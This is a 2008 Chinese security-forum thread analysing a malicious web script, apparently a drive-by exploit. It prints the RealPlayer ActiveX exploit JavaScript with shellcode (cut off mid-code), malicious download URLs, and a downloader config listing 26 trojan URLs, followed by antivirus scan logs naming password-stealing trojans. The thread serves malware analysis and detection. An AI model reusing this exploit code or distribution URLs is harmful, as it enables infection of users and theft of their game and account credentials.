恶意脚本

显示全部楼层 · 发表于 2008-3-14 15:40:49

检测到：恶意程序 Exploit.JS.RealPlr.fb URL: http://4.9797aiai.com/root/rr.js

请高手分析

显示全部楼层 · 发表于 2008-3-14 15:56:36

var addr=["%75%06%74%04","%7f%a5%60","%4f%71%a4%60","%63%11%08%60","%63%11%04%60","%79%31%01%60","%79%31%09%60","%51%11%70%63"];function xinnuo(){var user=navigator.userAgent.toLowerCase();if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)return;if(user.indexOf("nt 5.")==-1)return;VulObject="IEaaR"+"PCaaatl.I"+"EaaaRP"+"Ctaaal.1";try{Real=new ActiveXObject(VulObject.replace(/a/g,""))}catch(error){return}RealVersion=Real.PlayerProperty("PRODUCTVERSION");sdfdgdfg="";cvbcbb=unescape(addr[0]);for(i=0;i<32*148;i++)sdfdgdfg+="S";if(RealVersion.indexOf("6.0.14.")==-1){if(navigator.userLanguage.toLowerCase()=="zh-cn")ret=unescape(addr[1]);else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape(addr[2]);else return}else if(RealVersion=="6.0.14.544")ret=unescape(addr[3]);else if(RealVersion=="6.0.14.550")ret=unescape(addr[4]);else if(RealVersion=="6.0.14.552")ret=unescape(addr[5]);else if(RealVersion=="6.0.14.543")ret=unescape(addr[6]);else if(RealVersion=="6.0.14.536")ret=unescape(addr[7]);else return;if(RealVersion.indexOf("6.0.10.")!=-1){for(i=0;i<4;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}else if(RealVersion.indexOf("6.0.11.")!=-1){for(i=0;i<6;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}else if(RealVersion.indexOf("6.0.12.")!=-1){for(i=0;i<9;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}else if(RealVersion.indexOf("6.0.14.")!=-1){for(i=0;i<10;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}qwfgsg="LLLL\\XXXXXLD";Shell="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoVQTnvYVWTy6W3QU93QSYfNpcpoPmtorM0mToRMPmVNQuqh1uopuP";xcbfcxn=sdfdgdfg+qwfgsg+Shell;temp=0x8000;while(xcbfcxn.length

hxxp://1.9797aiai.com/mm/mm.exe

mm.exe MD5：6F77C84710834E87FAD0FA685755B2F6

xiexie.txt
[quote][CONTROL]
VERSION=2008-2-3

[DOWN]
NEWVERSION=http://cc.fockfock.com/mm/up.exe
1=http://cc.fockfock.com/mm/aa1.exe
2=http://cc.fockfock.com/mm/aa2.exe
3=http://cc.fockfock.com/mm/aa3.exe
4=http://cc.fockfock.com/mm/aa4.exe
5=http://cc.fockfock.com/mm/aa5.exe
6=http://cc.fockfock.com/mm/aa6.exe
7=http://cc.fockfock.com/mm/aa7.exe
8=http://cc.fockfock.com/mm/aa8.exe
9=http://cc.fockfock.com/mm/aa9.exe
10=http://cc.fockfock.com/mm/aa10.exe
11=http://cc.fockfock.com/mm/aa11.exe
12=http://cc.fockfock.com/mm/aa12.exe
13=http://cc.fockfock.com/mm/aa13.exe
14=http://cc.fockfock.com/mm/aa14.exe
15=http://cc.fockfock.com/mm/aa15.exe
16=http://cc.fockfock.com/mm/aa16.exe
17=http://cc.fockfock.com/mm/aa17.exe
18=http://cc.fockfock.com/mm/aa18.exe
19=http://cc.fockfock.com/mm/aa19.exe
20=http://cc.fockfock.com/mm/aa20.exe
21=http://cc.fockfock.com/mm/aa21.exe
22=http://cc.fockfock.com/mm/aa22.exe
23=http://cc.fockfock.com/mm/aa23.exe
24=http://cc.fockfock.com/mm/aa24.exe
25=http://cc.fockfock.com/mm/aa25.exe
26=http://cc.fockfock.com/mm/aa26.exe

样本：

11.rar (449.24 KB, 下载次数: 110)

显示全部楼层 · 发表于 2008-3-14 16:04:38

C:\Documents and Settings\Administrator\桌面\mm.exe
[DETECTION] Contains detection pattern of the rootkit RKIT/HideProcess.B

显示全部楼层 · 发表于 2008-3-14 16:13:53

请问高手啊，那些是什么病毒啊？可不可以简介一下？
26个啊

显示全部楼层 · 发表于 2008-3-14 16:14:57

基本都是到好的吧，用杀毒软件扫下就知道了

显示全部楼层 · 发表于 2008-3-14 16:24:47

v8漏一个

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\11'
C:\Documents and Settings\Administrator\My Documents\11\
  aa1.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
         [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.tjq
         [WARNING] Infected files in archives cannot be repaired!
      --> Object
         [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.tkz
         [WARNING] Infected files in archives cannot be repaired!
   [NOTE]    The file was deleted!
  aa10.exe
[0] Archive type: Runtime Packed
--> Object
   [NOTE]    The file was deleted!
  aa11.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
   [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
   [NOTE]    The file was deleted!
  aa12.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
   [DETECTION] Is the Trojan horse TR/Dropper.Gen
   [NOTE]    The file was deleted!
  aa13.exe
[0] Archive type: Runtime Packed
--> Object
   [NOTE]    The file was deleted!
  aa14.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
      [2] Archive type: Runtime Packed
      --> Object
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
  aa15.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
   [DETECTION] Contains detection pattern of the dropper DR/Delphi.Gen
   [NOTE]    The file was deleted!
  aa16.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
   [DETECTION] Is the Trojan horse TR/Dropper.Gen
   [NOTE]    The file was deleted!
  aa17.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.tzz.2
   [NOTE]    The file was deleted!
  aa18.exe
  aa19.exe
   [DETECTION] Is the Trojan horse TR/Drop.Agent.jue.1
   [NOTE]    The file was deleted!
  aa2.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
      [2] Archive type: Runtime Packed
      --> Object
      --> Object
   [DETECTION] Contains suspicious code HEUR/Malware
   [NOTE]    The fund was classified as suspicious.
   [NOTE]    The file was moved to '480c44a5.qua'!
  aa20.exe
[0] Archive type: Runtime Packed
--> Object
   [NOTE]    The file was deleted!
  aa21.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
   [DETECTION] Is the Trojan horse TR/Dropper.Gen
   [NOTE]    The file was deleted!
  aa22.exe
   [DETECTION] Is the Trojan horse TR/Drop.Agent.jue.1
   [NOTE]    The file was deleted!
  aa23.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
      [2] Archive type: Runtime Packed
      --> Object
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
  aa24.exe
[0] Archive type: Runtime Packed
--> Object
   [NOTE]    The file was deleted!
  aa25.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnLineGame.XO
   [NOTE]    The file was deleted!
  aa26.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
   [DETECTION] Is the Trojan horse TR/Dropper.Gen
   [NOTE]    The file was deleted!
  aa3.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
      [2] Archive type: Runtime Packed
      --> Object
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
  aa4.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
   [DETECTION] Is the Trojan horse TR/Dropper.Gen
   [NOTE]    The file was deleted!
  aa5.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnLineGame.XO
   [NOTE]    The file was deleted!
  aa6.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
   [DETECTION] Is the Trojan horse TR/Dropper.Gen
   [NOTE]    The file was deleted!
  aa7.exe
[0] Archive type: Runtime Packed
--> Object
   [NOTE]    The file was deleted!
  aa8.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
   [DETECTION] Is the Trojan horse TR/Dropper.Gen
   [NOTE]    The file was deleted!
  aa9.exe
[0] Archive type: Runtime Packed
   --> Object
      [1] Archive type: RSRC
      --> Object
   [DETECTION] Is the Trojan horse TR/Dropper.Gen
   [NOTE]    The file was deleted!

End of the scan: 2008年3月14日  01:24
Used time: 00:05 min

The scan has been done completely.

   1 Scanning directories
   26 Files were scanned
   20 viruses and/or unwanted programs were found
   6 Files were classified as suspicious:
   24 files were deleted
   0 files were repaired
   1 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
   6 Files not concerned
   0 Archives were scanned
   2 Warnings
   25 Notes

显示全部楼层 · 发表于 2008-3-14 16:30:42

BD 18

显示全部楼层 · 发表于 2008-3-14 16:46:39

25
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa1.exe TrojanPSW.OnLineGames.tde.pewt 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa10.exe TrojanPSW.OnLineGames.ubw.jhbf 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa11.exe PWSteal.Lemir.bpv.lpim 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa12.exe W32.Viking.k 病毒还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa13.exe Trojan.Agent.hjb.ixgz 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa14.exe TrojanPSW.GameOL.mjf.pkzq 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa15.exe Trojan.Nemqun.uazj 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa16.exe W32.Viking.k 病毒还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa17.exe W32.Warezov.p 病毒还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa19.exe W32.Warezov.p 病毒还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa2.exe TrojanDownloader.Nurech.bd.bmqk 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa20.exe TrojanPSW.OnLineGames.sxq.ivoh 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa21.exe W32.Viking.k 病毒还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa22.exe W32.Warezov.p 病毒还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa23.exe TrojanPSW.OnLineGames.tmj.eqlk 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa24.exe TrojanPSW.OnLineGames.ubw.tizl 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa25.exe TrojanPSW.OnLineGames.rkf.obcy 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa26.exe W32.Viking.k 病毒还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa3.exe TrojanPSW.OnLineGames.tmj.xqof 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa4.exe W32.Viking.k 病毒还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa5.exe TrojanPSW.OnLineGames.rkf.jyxb 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa6.exe TrojanPSW.OnLineGames.tlm.hvau 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa7.exe TrojanPSW.OnLineGames.ubw.adhr 木马还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa8.exe W32.Viking.k 病毒还未处理
C:\Documents and Settings\Administrator\桌面\11.rar>>11\aa9.exe W32.Viking.k 病毒还未处理

显示全部楼层 · 发表于 2008-3-14 16:49:30

伞C25，剩一个好象无法运行

显示全部楼层 · 发表于 2008-3-14 16:59:56

扫描进行于：2008-3-14 16:58:40
扫描日志
NOD32版本 2946 (20080313) NT
命令行： C:\Documents and Settings\cnelf\桌面\11.rar

日期： 14.3.2008 时间：16:58:43
已开启反隐藏功能.
已扫描的磁盘，文件夹及文件：C:\Documents and Settings\cnelf\桌面\11.rar
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa1.exe - 可能是 Win32/PSW.OnLineGames.NMQ 木马的一个变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa11.exe - Win32/PSW.WOW.WU 木马
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa12.exe - 可能是 Win32/PSW.OnLineGames.NFL 木马的一个变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa13.exe - 可能是 Win32/PSW.OnLineGames.NML 木马的一个变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa14.exe - Win32/PSW.OnLineGames.MUG 木马的变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa15.exe - Win32/PSW.QQPass.NCZ 木马的变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa16.exe - 可能是 Win32/PSW.OnLineGames.NFL 木马的一个变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa17.exe - Win32/PSW.OnLineGames.PBQ 木马的变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa19.exe - Win32/PSW.OnLineGames.PBQ 木马的变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa2.exe - 可能是 Win32/PSW.OnLineGames.NMQ 木马的一个变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa20.exe - 可能是 Win32/PSW.OnLineGames.NML 木马的一个变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa21.exe - 可能是 Win32/PSW.OnLineGames.NFL 木马的一个变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa22.exe - Win32/PSW.OnLineGames.PBQ 木马的变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa23.exe - Win32/PSW.OnLineGames.MUG 木马
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa25.exe - Win32/PSW.OnLineGames.GJV 木马的变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa26.exe - 可能是 Win32/PSW.OnLineGames.NFL 木马的一个变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa3.exe - Win32/PSW.OnLineGames.MUG 木马的变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa4.exe - 可能是 Win32/PSW.OnLineGames.NFL 木马的一个变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa5.exe - Win32/PSW.OnLineGames.GJV 木马的变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa6.exe - Win32/PSW.OnLineGames.YA 木马的变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa8.exe - 可能是 Win32/PSW.OnLineGames.NFL 木马的一个变种
C:\Documents and Settings\cnelf\桌面\11.rar >>RAR >>11\aa9.exe - 可能是 Win32/PSW.OnLineGames.NFL 木马的一个变种
已扫描的文件数目：26
已发现的病毒数目：22
完成时间： 16:58:46 总扫描时间：3 秒 (00:00:03)

[已鉴定] 恶意脚本

回复 4楼 a87750530 的帖子

浏览过的版块